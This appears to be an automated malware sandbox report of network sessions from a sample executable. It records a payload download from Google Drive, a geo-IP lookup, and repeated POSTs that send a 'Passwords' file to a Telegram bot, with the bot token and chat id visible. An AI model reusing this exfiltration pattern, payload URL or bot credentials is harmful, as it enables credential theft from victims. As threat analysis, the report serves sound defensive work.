                                                                                                        Location: https://drive.usercontent.google.com/download?id=1H9-NX9FTfhx7ES6nhfZpdxVzAkPSYSRn&export=download
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Content-Security-Policy: script-src 'nonce-mUveWWPSSB4_gAjPenGrZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Server: ESF
                                                                                                        Content-Length: 0
                                                                                                        X-XSS-Protection: 0
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        1192.168.2.949710216.58.206.654438088C:\Users\user\Desktop\14lVOjBoI2.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-11 06:20:02 UTC258OUTGET /download?id=1H9-NX9FTfhx7ES6nhfZpdxVzAkPSYSRn&export=download HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                        Cache-Control: no-cache
                                                                                                        Host: drive.usercontent.google.com
                                                                                                        Connection: Keep-Alive
                                                                                                        2025-01-11 06:20:04 UTC4945INHTTP/1.1 200 OK
                                                                                                        X-GUploader-UploadID: AFIdbgTm1LDtkB_CGcLXLlTs5xUPXsNB0TEzM_DBUOMfF2aiCwYs09jAvM45ZY82tV3pgJHKF05riPI
                                                                                                        Content-Type: application/octet-stream
                                                                                                        Content-Security-Policy: sandbox
                                                                                                        Content-Security-Policy: default-src 'none'
                                                                                                        Content-Security-Policy: frame-ancestors 'none'
                                                                                                        X-Content-Security-Policy: sandbox
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Cross-Origin-Embedder-Policy: require-corp
                                                                                                        Cross-Origin-Resource-Policy: same-site
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Content-Disposition: attachment; filename="fCOgTxJRNemdJIGP86.bin"
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Credentials: false
                                                                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                        Accept-Ranges: bytes
                                                                                                        Content-Length: 94272
                                                                                                        Last-Modified: Sun, 15 Dec 2024 11:07:30 GMT
                                                                                                        Date: Sat, 11 Jan 2025 06:20:04 GMT
                                                                                                        Expires: Sat, 11 Jan 2025 06:20:04 GMT
                                                                                                        Cache-Control: private, max-age=0
                                                                                                        X-Goog-Hash: crc32c=ZqRaQA==
                                                                                                        Server: UploadServer
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close
                                                                                                        2025-01-11 06:20:04 UTC4945INData Raw: 4e f5 be 78 dd 6e cf 88 08 00 c7 25 43 2c 44 59 c4 05 f2 c8 57 47 3b 36 32 bb cc 79 5a 48 89 fa a8 cf ed 55 fb 23 27 c8 33 2a 42 dc e5 f8 1b 0d 45 15 89 29 e6 43 07 cf 1e 2a cc 40 3d 48 bd 07 f7 97 fe 6e 45 27 f7 94 68 60 2f da b4 94 60 cd 88 63 18 cc b4 fb 0f 31 4f 2c fd 99 5d ce b2 1d 8f ac 65 54 a8 6b 31 f3 4c 1c 49 05 d5 b1 fd 99 42 aa a9 74 f1 c4 70 c1 c3 90 b3 9b c4 5b b8 97 ed 76 4b 8f a4 e8 c9 cb 38 e9 63 67 00 79 95 44 e2 01 c7 ea 37 b1 50 0f 14 37 95 3c 7b d5 09 ea a1 f0 1d 98 20 8c 29 8a 7c 4d 9a 30 81 5f 66 95 ac 23 df 19 74 67 78 3a 26 ac 43 a0 2b 43 30 d3 95 f9 f2 72 55 70 b8 9a 86 f8 65 86 2b 05 ce 24 45 8b f3 2b 57 32 66 a2 5d 42 d6 bd a6 bd 0f 45 e9 3a c1 66 48 50 63 43 67 c8 c9 2d 41 0b 5b e3 ae 83 a8 23 7d 1d f2 81 fe a9 74 2e 0f 3f 9e
                                                                                                        Data Ascii: Nxn%C,DYWG;62yZHU#'3*BE)C*@=HnE'h`/`c1O,]eTk1LIBtp[vK8cgyD7P7<{ )|M0_f#tgx:&C+C0rUpe+$E+W2f]BE:fHPcCg-A[#}t.?
                                                                                                        2025-01-11 06:20:04 UTC4803INData Raw: d6 21 75 fb 33 da d5 1a bb 6d 85 dc bf 09 fd 00 f4 5c 9a 4e 24 f4 14 ed 9b 35 b5 cb 4c 65 70 5a 63 59 37 0b c3 42 a0 2b 49 30 0f 1b af d7 5a 2a 71 bb 90 22 c6 10 1f 79 05 ce 2e 98 9c f1 2b b7 32 64 a3 28 5b 86 bd a2 a9 58 4e e9 42 d7 4e c9 50 63 49 af b3 c9 3e 44 3a 5e da b5 22 a9 23 7d 6e 3e 81 fe 83 67 28 1e 3b e0 b0 c1 31 fb c4 16 fd 46 0c 2d e5 6e 7a d3 e7 4e 15 75 c5 4b 6d a6 88 65 6f 36 27 8a 2f 86 ec 1e f2 62 fc fd 72 a5 df e5 b1 8a ca 89 58 1f 4f ac 6e b6 94 66 ad ed 1b 55 34 8d 12 18 9a f8 51 17 ba 32 b8 b9 7a 8e 6a 41 09 7a 90 81 da e7 3c e0 4d c3 d7 89 4a 8c fb 29 a0 91 44 a8 4b 87 91 1c 09 69 75 23 7c bc f6 cc 3b da 89 6e 46 10 ce 45 b2 87 d0 77 72 23 23 f0 bf 42 4d 0d 5f c3 35 f5 ae 53 f4 7a e3 cf 76 5e 5b 55 a8 03 f9 91 62 01 a4 5d de 18 1d
                                                                                                        Data Ascii: !u3m\N$5LepZcY7B+I0Z*q"y.+2d([XNBNPcI>D:^"#}n>g(;1F-nzNuKmeo6'/brXOnfU4Q2zjAz<MJ)DKiu#|;nFEwr##BM_5Szv^[Ub]
                                                                                                        2025-01-11 06:20:04 UTC1328INData Raw: 36 f2 65 80 5b b9 02 b6 00 fe 58 e6 5e 5f bf 10 c5 14 1d 64 c1 4c b1 01 10 6a 75 34 07 ba 41 db 61 43 30 d7 c7 c7 b9 72 19 75 93 48 31 c2 1a 37 29 00 40 4d 38 c6 f3 2b b3 30 66 d8 1b 43 86 b9 8e 0a 0e 45 e3 4f 8d 66 48 54 63 43 93 4d c8 2d 52 1b 59 e3 34 23 a9 23 59 1d b2 90 fe 8b 0f 68 0f 3d 9a d0 92 31 ff bd b3 a9 46 06 48 61 68 69 dd f6 5b 3f 17 48 30 2b ac f6 40 47 e5 23 e5 b5 86 ec 14 f0 08 b0 d5 e3 a1 a1 bc c3 fa cb a1 7c 37 79 a6 65 b7 e8 5e bc e8 3d 70 71 f6 58 12 f5 6e 79 c4 b0 32 a3 bf 08 8a 6f 3a 31 04 8d 85 a4 b0 4e 72 4c eb f3 a1 0d 86 f7 2b dc 04 55 ae 6d 8a ed 75 41 69 71 54 c0 6f f6 c6 22 dd 98 68 2b fe 82 45 b8 92 a9 4b e4 23 29 d2 eb 3c 6d 07 52 ce 55 65 bf 54 d2 64 e9 ca 21 5e 5b 55 f2 4c f2 91 18 17 8c dc f4 18 17 0a 2e ac 67 86 50 40
                                                                                                        Data Ascii: 6e[X^_dLju4AaC0ruH17)@M8+0fCEOfHTcCM-RY4##Yh=1FHahi[?H0+@G#|7ye^=pqXny2o:1NrL+UmuAiqTo"h+EK#)<mRUeTd!^[UL.gP@
                                                                                                        2025-01-11 06:20:04 UTC1390INData Raw: f8 14 82 d1 df c2 ea ca 17 ef c3 fc 63 ac 30 45 55 b9 6e c0 59 7e b4 e4 7e b9 73 8d 14 b0 d0 70 23 51 a5 32 d9 1d 2d 91 64 2e bf 04 8d 87 78 c6 52 00 26 d6 a7 d1 af a4 5b 23 cf 08 57 ac 3f 88 ef 0e 0d 78 75 78 a6 bc f6 cc a8 d2 98 68 2d 85 dc 47 90 4b d7 18 ee 30 26 eb ba 11 fc d3 50 d5 44 9c b8 5f fe 69 f0 de 6c 5e 5b 5b da 43 f2 ba 10 17 8c f6 df 08 17 11 1c a6 7a ac 2b d7 74 db 47 39 9b 33 51 3f b4 4a 59 6c c5 82 a7 82 46 ef 90 12 d3 e4 94 1c 53 91 4d f8 80 79 3a ed a2 61 96 45 a1 1c 57 76 cc bf 60 60 76 89 38 a4 53 9c 81 49 5f 33 35 f9 74 c5 4f cc a9 45 f0 da 87 59 39 c6 c6 ad 79 fd 3b 6e b1 ef 3e c0 9b 33 4a 6b 91 17 5e 25 be 7b 62 a9 b5 fe 59 3b b1 3b ff 50 d0 99 b7 68 a2 8f 10 6a 4a a9 6b ec 1b eb a8 24 36 f6 0f 07 2e 48 36 41 ab 0c 9a 96 c6 a5 3f
                                                                                                        Data Ascii: c0EUnY~~sp#Q2-d.xR&[#W?xuxh-GK0&PD_il^[[Cz+tG93Q?JYlFSMy:aEWv``v8SI_35tOEY9y;n>3Jk^%{bY;;PhjJk$6.H6A?
                                                                                                        2025-01-11 06:20:04 UTC1390INData Raw: 4d 15 31 4b 3c 73 ee 36 5d b4 9c d8 29 99 39 38 40 8b 06 23 d0 72 75 73 ad 64 35 4e 45 65 28 f0 4b ac 65 af 1a 82 fa cf 1a 25 48 c9 c9 09 82 a0 4b d9 fc 7d e9 2a 58 57 20 06 58 80 9c 14 a8 68 bd ed 37 40 b0 6f 84 bd 2d 5f ce f9 2d b2 d4 31 8f 7e 6e 51 40 5a 8e 5f 0b 3a 51 32 f5 d8 d4 3e 48 ab 24 af 9b b0 72 a4 c2 fc 25 6e 0a 42 61 be d4 24 10 d0 f1 38 af 31 68 84 b1 c1 d2 55 0f 2a 23 d5 7a e5 4d d7 c6 43 e3 71 ad 45 06 0b 44 68 cb b2 6f 6c e1 b5 5c 45 f6 4a 37 44 d3 b7 52 d8 6e 9c 5b 5b f4 9f 0b d6 cc f8 84 89 4b b2 3f 11 15 1f 73 8e d7 7c b7 79 c6 55 dd d3 a3 cd 17 c5 a5 d8 9e 3e f5 9a da da 98 ce 1f 39 42 4f ec 49 2b e2 af 54 88 31 e5 98 76 56 87 13 26 b1 fa c0 0f b0 f1 b0 61 5c 03 7a 3d b9 bd f7 b2 c3 7d 97 38 c8 ed e8 29 98 8d 07 94 54 2b b0 ff bc cf
                                                                                                        Data Ascii: M1K<s6])98@#rusd5NEe(Ke%HK}*XW Xh7@o-_-1~nQ@Z_:Q2>H$r%nBa$81hU*#zMCqEDhol\EJ7DRn[[K?s|yU>9BOI+T1vV&a\z=}8)T+
                                                                                                        2025-01-11 06:20:04 UTC1390INData Raw: c2 40 48 8a 04 27 9f db 2e b2 e0 1e 39 5b 78 fd 53 12 ff be 52 81 ce e4 8a 77 47 91 31 38 a0 ff d1 16 53 11 6f 61 2c 21 27 22 a8 a9 ee bb 66 e1 97 38 c3 c9 a1 01 60 87 14 88 30 37 b4 f2 c5 cf 99 57 7e 85 36 58 c7 c1 8f b1 ef 8b 71 1b 29 23 25 10 2e fe b6 4d a8 ef e7 98 a4 03 45 f1 54 c4 11 e6 34 03 5b bf 87 89 20 da 99 35 f9 78 49 d2 db c0 89 62 21 08 18 3d f5 ef 70 a1 cc c0 12 7e 62 7d 65 6e 6f 24 6f a5 02 ad 94 20 5a cc f5 59 0a 1f e8 13 4c a6 cc 7f e9 db 43 29 47 4e 24 0a f7 f7 16 cf cf 4a d6 3b fa f8 43 18 49 67 53 f4 36 4d 69 03 9d 21 10 0b 87 e6 15 67 09 02 34 c2 b0 63 77 ca ff 83 12 3a 76 24 50 df e6 bf 27 6e 0e de fa 7c 6f 5c 47 99 13 1b 9b 73 a2 c3 c1 03 9b 13 75 dd 4b d6 fe 6d 8f 28 d3 88 e3 41 17 57 bf 6b 7c e6 47 8d c1 41 f6 be 72 2f 07 48 94
                                                                                                        Data Ascii: @H'.9[xSRwG18Soa,!'"f8`07W~6Xq)#%.MET4[ 5xIb!=p~b}eno$o ZYLC)GN$J;CIgS6Mi!g4cw:v$P'n|o\GsuKm(AWk|GAr/H
                                                                                                        2025-01-11 06:20:04 UTC1390INData Raw: cf 9d c3 a9 dd ee cf 67 2b 77 3f 61 f7 eb d2 2e 1b 1f ed fa 7d 11 5d 58 85 31 c3 47 7b 26 d8 fa c4 8c b9 4a 45 c6 8f f4 67 8e 3d fc 78 f8 50 1a 4a b0 dc 53 fc 9d a5 a1 32 21 b4 72 29 1a 47 f2 88 33 e0 83 e5 32 c1 c5 42 75 f5 09 2a 7e 1d 48 5b 40 c9 e9 a7 d2 bd 17 00 ae 4e 43 28 a0 5b 96 dd 7d 60 80 1b 36 8f 07 d1 02 5c 43 63 99 ca a1 95 05 93 6d ae fe f4 43 33 9b 5b 10 69 34 07 92 7c 76 3d 61 72 d4 39 7d 7b 30 9d 58 45 a3 9e 04 10 67 eb d3 21 b1 8c 09 16 1c cc 1a 93 a4 a4 ea 1b d2 82 6e 13 58 5b 15 02 e6 fc 63 21 cd 63 d5 b2 54 b4 fd b0 e8 b6 f9 b7 33 dd 9c be ce 20 5f d5 13 2c 12 85 38 97 9a 2a 67 d9 47 29 3f 3a 41 20 6d 6d 89 9a 3b aa 74 d9 85 14 0b 0a cc f7 91 7e ab 87 fb 28 3e db 01 22 92 63 66 5e 07 3a e2 2d 54 4c 13 cb 86 db 73 b1 83 e1 87 7d b7 00
                                                                                                        Data Ascii: g+w?a.}]X1G{&JEg=xPJS2!r)G32Bu*~H[@NC([}`6\CcmC3[i4|v=ar9}{0XEg!nX[c!cT3 _,8*gG)?:A mm;t~(>"cf^:-TLs}
                                                                                                        2025-01-11 06:20:04 UTC1390INData Raw: 20 d5 13 20 10 85 46 cd b2 b9 6d c8 48 12 a2 2b 49 0a 3d 6e a1 99 3a 81 5e b6 a9 bf 0b 00 a9 fa 81 79 d3 33 73 28 4e b2 c7 2b 83 6c 1d ff 06 29 e2 14 e2 5a ed cc 86 d5 62 ab ab 85 4d d2 b7 70 60 ef 79 6b fd bf e3 a9 01 3b 59 df 3d b7 a3 1f d8 ac f2 de 18 24 b7 0f 99 ad f7 ff 56 ab ef 39 c4 9e 21 d3 05 14 b0 92 10 49 1c 4d 2c 90 fd 96 32 7d c3 2e c8 83 64 cc a2 e8 ac ef ec 20 72 14 de f9 c8 74 b4 e4 35 f4 bb f6 3c c1 65 7e e3 57 26 c5 77 61 2f 6a c8 75 25 3d 55 d8 06 43 b9 de 4d 36 3f 51 44 14 71 a5 5c 6f ae dc 5a 55 e2 2c 89 d8 b2 f8 da c7 c4 ad 15 28 c6 dc 9f 23 bc ff a9 ca b3 1b 79 11 21 fb 3e b5 f7 85 28 d4 bb 1f f2 b9 20 00 6d fd a9 c0 10 61 46 27 f3 85 61 48 61 da 4b 61 e0 c2 30 63 1c cc b4 ea 08 26 d9 3f fa 88 5a df b4 23 6f 52 9a ab a8 6b ef e3 69
                                                                                                        Data Ascii: FmH+I=n:^y3s(N+l)ZbMp`yk;Y=$V9!IM,2}.d rt5<e~W&wa/ju%=UCM6?QDq\oZU,(#y!>( maF'aHaKa0c&?Z#oRki
                                                                                                        2025-01-11 06:20:04 UTC1390INData Raw: 91 3d ca c3 b3 4a f4 33 ef 99 e2 09 f2 06 84 ad 47 d1 91 80 0a 7b 09 b9 92 7d 62 57 2b db d9 71 ed 10 da 4b 6a 45 db 42 85 0c cc c4 59 2a 26 06 8e d8 81 2f e2 a7 1d ff 0e 40 4d b9 6f 93 d6 56 6e 0f 10 d5 c1 5f bc 59 bb ac d6 d4 d8 02 0a e1 90 c3 39 6c fb b8 97 e9 7a fc ff ab 5c c0 02 08 5c 4a 65 cd 58 cb ac 84 72 e7 9e 45 de 26 7a 62 8c a6 58 0b bc 76 83 eb 30 81 02 ff fe 5c 3a 4c 01 dc 23 c5 10 3f a6 cf 4c 93 2e 5a 6a 7f ee 02 ac 69 e1 37 43 30 d3 c5 bc f2 61 19 71 bb cd 30 c2 10 5d 2a 05 ce 34 45 8b f3 6f b7 32 65 b8 66 47 86 c1 a7 db 0e 76 e9 32 d0 66 57 4c 4b 9b b9 4d c2 5f 72 08 5b 93 86 6d a9 23 77 17 b2 87 d6 71 74 2e 05 36 99 97 87 30 ff b7 9d 8e 91 06 42 6d 62 72 ab bd 43 13 6a 25 99 6d ac f0 62 67 59 f0 e5 bf 80 fb ce e1 75 ec c6 e4 9d c8 ee c3
                                                                                                        Data Ascii: =J3G{}bW+qKjEBY*&/@MoVn_Y9lz\\JeXrE&zbXv0\:L#?L.Zji7C0aq0]*4Eo2efGv2fWLKM_r[m#wqt.60BmbrCj%mbgYu
                                                                                                        2025-01-11 06:20:04 UTC1390INData Raw: 8a 4d c8 27 52 25 5b cb fc 23 a9 29 a3 1d b2 ab bf 95 74 2e 0f 3d 9e ae d2 31 ff b7 cc fc 46 06 28 6a 6e 7a c9 e7 5f 13 5e 4a 4b 6c b7 c6 40 6f 4a 22 e5 bf b5 ec 14 e3 73 e5 c9 cb 7d df ef c9 88 58 ac 28 47 51 e2 6e b0 f1 51 ad eb 39 85 73 8d 18 19 f2 53 17 16 b0 32 af cc df 8a 6d 47 75 0c ff db c6 e3 3e 1d 94 c3 a7 a7 2b 84 94 f0 cf 02 42 bf 9b 94 e9 18 1a 6e 49 47 e9 bc f6 ce 39 da ea 00 35 85 be 2a 6d 96 d7 1e e9 2b 32 fd cd 42 71 0d 2f a8 93 62 ae 55 ed 6d e3 a0 6a 2c c7 4d da ef 9d 44 12 17 8a cf db 09 12 39 8d a6 67 aa 42 48 65 dc 6b 7a 9d 1b 49 0e be 40 7c 6b c4 82 81 ed 43 ff 90 6b 22 70 94 16 5e 98 c9 d6 89 6d c5 c9 a7 19 4d 5a b7 92 f4 40 d0 dc 8d 59 60 d1 30 81 4b e4 92 5a 30 1c 97 dc 67 a6 58 f2 3c 35 52 d0 80 4f 3d dc 4b 17 59 fd 12 e1 a7 91
                                                                                                        Data Ascii: M'R%[#)t.=1F(jnz_^JKl@oJ"s}X(GQnQ9sS2mGu>+BnIG95*m+2Bq/bUmj,MD9gBHekzI@|kCk"p^mMZ@Y`0KZ0gX<5RO=KY


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        2192.168.2.949712104.21.32.14438088C:\Users\user\Desktop\14lVOjBoI2.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-11 06:20:16 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                        Host: reallyfreegeoip.org
                                                                                                        Connection: Keep-Alive
                                                                                                        2025-01-11 06:20:16 UTC861INHTTP/1.1 200 OK
                                                                                                        Date: Sat, 11 Jan 2025 06:20:16 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 362
                                                                                                        Connection: close
                                                                                                        Age: 1891205
                                                                                                        Cache-Control: max-age=31536000
                                                                                                        cf-cache-status: HIT
                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eJs2Pspgov9nACFGjTZ92LazTnEuRO7171DPDkr9Qc0z46yddJ341aD1hqJn3X%2BO%2F0SQMyrBWR8AY%2FhUKPRDnTZA10YiCiy70%2Bg7%2Fkzi26it1NXUFwD2B7eg2psAojUVp%2Be42Jq2"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 9002cccaace672b9-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1782&min_rtt=1776&rtt_var=670&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1644144&cwnd=217&unsent_bytes=0&cid=e3a6877e200593a4&ts=157&x=0"
                                                                                                        2025-01-11 06:20:16 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        3192.168.2.949713149.154.167.2204438088C:\Users\user\Desktop\14lVOjBoI2.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-11 06:20:28 UTC294OUTPOST /bot7950435483:AAFkeNvnoegSYKyL7niKKZ3tPB62z3LQcco/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd31de218acfdc
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        Connection: Keep-Alive
                                                                                                        2025-01-11 06:20:28 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 64 65 32 31 38 61 63 66 64 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd31de218acfdcContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-11 06:20:28 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Sat, 11 Jan 2025 06:20:28 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-11 06:20:28 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 35 39 34 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 39 35 30 34 33 35 34 38 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 78 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 78 78 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 37 35 38 35 39 31 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 52 65 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 52 65 78 41 62 65 6c 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 34 32 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":5948,"from":{"id":7950435483,"is_bot":true,"first_name":"vandroxx","username":"vandroxx_bot"},"chat":{"id":6897585916,"first_name":"Rex","username":"RexAbel1","type":"private"},"date":1736576428,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        4192.168.2.949715149.154.167.2204438088C:\Users\user\Desktop\14lVOjBoI2.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-11 06:20:32 UTC294OUTPOST /bot7950435483:AAFkeNvnoegSYKyL7niKKZ3tPB62z3LQcco/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd32068823f644
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        Connection: Keep-Alive
